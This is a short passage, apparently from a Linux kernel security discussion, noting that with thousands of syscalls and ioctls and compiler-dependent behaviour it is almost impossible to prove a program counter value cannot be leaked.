compiler and the previously executed syscall (there are thousands of
them if we count ioctls and friends), so it is almost impossible to
prove that a PC cannot be leaked.